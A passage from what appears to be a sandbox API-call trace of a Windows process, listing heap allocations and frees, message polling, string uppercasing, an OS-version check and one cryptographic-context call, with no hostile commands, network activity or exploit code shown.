wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0189.208] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2da8 | out: hHeap=0x25c0000) returned 1 [0189.208] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0189.208] CharUpperBuffW (in: lpsz="A5500B04258", cchLength=0xb | out: lpsz="A5500B04258") returned 0xb [0189.208] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3bc8 | out: hHeap=0x25c0000) returned 1 [0189.208] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2da8 | out: hHeap=0x25c0000) returned 1 [0189.208] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0189.208] CharUpperBuffW (in: lpsz="SSA5500B04258", cchLength=0xd | out: lpsz="SSA5500B04258") returned 0xd [0189.208] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0189.208] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0189.208] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0189.208] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0189.208] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0189.209] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0189.209] CharUpperBuffW (in: lpsz="OSVersion", cchLength=0x9 | out: lpsz="OSVERSION") returned 0x9 [0189.209] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="WIN_7", cchCount1=5, lpString2="WIN_2000", cchCount2=8) returned 3 [0189.209] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0189.209] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0189.209] PeekMessageW (in: lpMsg=0x8bf050, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf050) returned 0 [0189.209] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0189.209] PeekMessageW (in: lpMsg=0x8bf050, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf050) returned 0 [0189.209] PeekMessageW (in: lpMsg=0x8bf050, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf050) returned 0 [0189.209] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0189.209] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa580 [0189.209] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c28 [0189.209] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c98 [0189.209] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa688 [0189.210] CryptAcquireContextA (in: phProv=0x8befe0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x8befe0*=0xaa3868) returned 1 [0189.211] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x214) returned 0x2416270 [0189.211] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466d90 [0189.211] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x2415a48 [0189.211] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa580 [0189.211] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa688 [0189.211] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa478 [0189.211] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x2415a18 [0189.211] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa478 | out: hHeap=0x25c0000) returned 1 [0189.211] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2415a18 | out: hHeap=0x25c0000) returned 1 [0189.211] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa688 | out: hHeap=0x25c0000) returned 1 [0189.211] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa688 [0189.211] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa478 [0189.211] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa460 [0189.211] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x2415a18 [0189.211] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa460 | out: hHeap=0x25c0000) returned 1 [0189.211] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2415a18 | out: hHeap=0x25c0000) returned 1 [0189.211] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa478 | out: hHeap=0x25c0000) returned 1 [0189.211] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa478 [0189.211] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa460 [0189.211] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa778 [0189.211] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x2415a18 [0189.212] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa778 | out: hHeap=0x25c0000) returned 1 [0189.212] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2415a18 | out: hHeap=0x25c0000) returned 1 [0189.212] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa460 | out: hHeap=0x25c0000) returned 1 [0189.212] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa460 [0189.212] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa778 [0189.212] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa418 [0189.212] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x2415a18 [0189.212] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa418 | out: hHeap=0x25c0000) returned 1 [0189.212] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2415a18 | out: hHeap=0x25c0000) returned 1 [0189.212] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa778 | out: hHeap=0x25c0000) returned 1 [0189.212] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa778 [0189.212] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa418 [0189.212] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4c0 [0189.212] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x2415a18 [0189.212] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4c0 | out: hHeap=0x25c0000) returned 1 [0189.212] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2415a18 | out: hHeap=0x25c0000) returned 1 [0189.212] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa418 | out: hHeap=0x25c0000) returned 1 [0189.212] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa418 [0189.212] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4c0 [0189.213] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6d0 [0189.213] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x2415a18 [0189.213] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6d0 | out: hHeap=0x25c0000) returned 1 [0189.213] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2415a18 | out: hHeap=0x25c0000) returned 1 [0189.213] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4c0 | out: hHeap=0x25c0000) returned 1 [0189.213] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c98 | out: hHeap=0x25c0000) returned 1 [0189.213] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2d28 | out: hHeap=0x25c0000) returned 1 [0189.213] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1198 | out: hHeap=0x25c0000) returned 1 [0189.213] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2de8 | out: hHeap=0x25c0000) returned 1 [0189.213] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2bb8 | out: hHeap=0x25c0000) returned 1 [0189.213] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3bc8 | out: hHeap=0x25c0000) returned 1 [0189.213] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa2b0 | out: hHeap=0x25c0000) returned 1 [0189.213] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13d8 | out: hHeap=0x25c0000) returned 1 [0189.214] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ac9f0 | out: hHeap=0x25c0000) returned 1 [0189.214] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9288 | out: hHeap=0x25c0000) returned 1 [0189.214] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa950 | out: hHeap=0x25c0000) returned 1 [0189.214] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa280 | out: hHeap=0x25c0000) returned 1 [0189.214] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa358 | out: hHeap=0x25c0000) returned 1 [0189.214] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa760 | out: hHeap=0x25c0000) returned 1 [0189.214] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa658 | out: hHeap=0x25c0000) returned 1 [0189.214] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aaec0 | out: hHeap=0x25c0000) returned 1 [0189.214] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa388 | out: hHeap=0x25c0000) returned 1 [0189.214] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa628 | out: hHeap=0x25c0000) returned 1 [0189.214] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa310 | out: hHeap=0x25c0000) returned 1 [0189.214] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa550 | out: hHeap=0x25c0000) returned 1 [0189.214] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa730 | out: hHeap=0x25c0000) returned 1 [0189.214] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa598 | out: hHeap=0x25c0000) returned 1 [0189.214] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa610 | out: hHeap=0x25c0000) returned 1 [0189.214] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa538 | out: hHeap=0x25c0000) returned 1 [0189.214] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa400 | out: hHeap=0x25c0000) returned 1 [0189.214] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa700 | out: hHeap=0x25c0000) returned 1 [0189.214] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa2e0 | out: hHeap=0x25c0000) returned 1 [0189.214] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5f8 | out: hHeap=0x25c0000) returned 1 [0189.214] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8e8 | out: hHeap=0x25c0000) returned 1 [0189.214] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2da8 | out: hHeap=0x25c0000) returned 1 [0189.215] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa968 | out: hHeap=0x25c0000) returned 1 [0189.215] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1708 | out: hHeap=0x25c0000) returned 1 [0189.215] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ac978 | out: hHeap=0x25c0000) returned 1 [0189.215] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x214) returned 0x2416490 [0189.215] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2416270 | out: hHeap=0x25c0000) returned 1 [0189.215] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0189.215] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1708 [0189.215] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2da8 [0189.215] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b13d8 [0189.215] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466db0 [0189.215] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2bb8 [0189.215] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ac978 [0189.215] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa968 [0189.215] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2de8 [0189.215] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aaec0 [0189.215] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2de8 | out: hHeap=0x25c0000) returned 1 [0189.215] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aaec0 | out: hHeap=0x25c0000) returned 1 [0189.215] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa968 | out: hHeap=0x25c0000) returned 1 [0189.215] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ac978 | out: hHeap=0x25c0000) returned 1 [0189.215] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2bb8 | out: hHeap=0x25c0000) returned 1 [0189.216] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13d8 | out: hHeap=0x25c0000) returned 1 [0189.216] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466db0 | out: hHeap=0x25c0000) returned 1 [0189.216] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2da8 | out: hHeap=0x25c0000) returned 1 [0189.216] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1708 | out: hHeap=0x25c0000) returned 1 [0189.216] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d820 [0189.216] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0189.216] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3bc8 [0189.216] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1708 [0189.216] CharUpperBuffW (in: lpsz="A1300D00639", cchLength=0xb | out: lpsz="A1300D00639") returned 0xb [0189.216] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3bc8 | out: hHeap=0x25c0000) returned 1 [0189.216] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1708 | out: hHeap=0x25c0000) returned 1 [0189.216] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ac978 [0189.216] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x1) returned 0x24b1708 [0189.216] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa968 [0189.216] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aaec0 [0189.216] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2da8 [0189.216] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b13d8 [0189.216] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa950 [0189.216] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9288 [0189.216] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2bb8 [0189.217] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ac9f0 [0189.217] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2bb8 | out: hHeap=0x25c0000) returned 1 [0189.217] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ac9f0 | out: hHeap=0x25c0000) returned 1 [0189.217] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9288 | out: hHeap=0x25c0000) returned 1 [0189.217] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa950 | out: hHeap=0x25c0000) returned 1 [0189.217] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13d8 | out: hHeap=0x25c0000) returned 1 [0189.217] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2da8 | out: hHeap=0x25c0000) returned 1 [0189.217] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24aa950 [0189.217] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3bc8 [0189.217] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9288 [0189.217] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2da8 [0189.217] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9288 | out: hHeap=0x25c0000) returned 1 [0189.217] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6508 [0189.217] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9288 [0189.217] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d8e8 [0189.217] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0189.217] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b13d8 [0189.217] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2bb8 [0189.217] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ac9f0 [0189.217] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa5f8 [0189.218] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2de8 [0189.218] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa2e0 [0189.218] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2de8 | out: hHeap=0x25c0000) returned 1 [0189.218] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2de8 [0189.218] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6c60 [0189.218] CharUpperBuffW (in: lpsz="SSA1300D00639", cchLength=0xd | out: lpsz="SSA1300D00639") returned 0xd [0189.218] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c60 | out: hHeap=0x25c0000) returned 1 [0189.218] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2de8 | out: hHeap=0x25c0000) returned 1 [0189.218] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa2e0 | out: hHeap=0x25c0000) returned 1 [0189.218] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5f8 | out: hHeap=0x25c0000) returned 1 [0189.218] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ac9f0 | out: hHeap=0x25c0000) returned 1 [0189.218] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2bb8 | out: hHeap=0x25c0000) returned 1 [0189.218] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13d8 | out: hHeap=0x25c0000) returned 1 [0189.218] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d7a0 [0189.218] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0189.218] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d7a0 | out: hHeap=0x25c0000) returned 1 [0189.218] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0189.218] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b13d8 [0189.218] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ac9f0 [0189.218] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa5f8 [0189.219] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2bb8 [0189.219] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa2e0 [0189.219] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2bb8 | out: hHeap=0x25c0000) returned 1 [0189.219] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa2e0 | out: hHeap=0x25c0000) returned 1 [0189.219] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5f8 | out: hHeap=0x25c0000) returned 1 [0189.219] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ac9f0 | out: hHeap=0x25c0000) returned 1 [0189.219] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13d8 | out: hHeap=0x25c0000) returned 1 [0189.219] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b13d8 [0189.219] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13d8 | out: hHeap=0x25c0000) returned 1 [0189.219] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0189.219] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8e8 | out: hHeap=0x25c0000) returned 1 [0189.219] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9288 | out: hHeap=0x25c0000) returned 1 [0189.219] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6508 | out: hHeap=0x25c0000) returned 1 [0189.219] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2da8 | out: hHeap=0x25c0000) returned 1 [0189.219] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3bc8 | out: hHeap=0x25c0000) returned 1 [0189.219] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa950 | out: hHeap=0x25c0000) returned 1 [0189.219] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1708 | out: hHeap=0x25c0000) returned 1 [0189.219] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ac978 | out: hHeap=0x25c0000) returned 1 [0189.219] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aaec0 | out: hHeap=0x25c0000) returned 1 [0189.219] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa968 | out: hHeap=0x25c0000) returned 1 [0189.220] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0189.220] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d820 | out: hHeap=0x25c0000) returned 1 [0189.220] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0189.220] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d860 | out: hHeap=0x25c0000) returned 1 [0189.220] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0189.220] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3bc8 [0189.220] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1708 [0189.220] CharUpperBuffW (in: lpsz="A610080612A", cchLength=0xb | out: lpsz="A610080612A") returned 0xb [0189.220] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3bc8 | out: hHeap=0x25c0000) returned 1 [0189.220] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1708 | out: hHeap=0x25c0000) returned 1 [0189.220] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24aa968 [0189.220] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d8e8 [0189.220] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0189.220] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1708 [0189.220] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2da8 [0189.220] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aaec0 [0189.220] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ac978 [0189.220] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b13d8 [0189.220] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa950 [0189.220] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13d8 | out: hHeap=0x25c0000) returned 1 [0189.220] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b13d8 [0189.221] 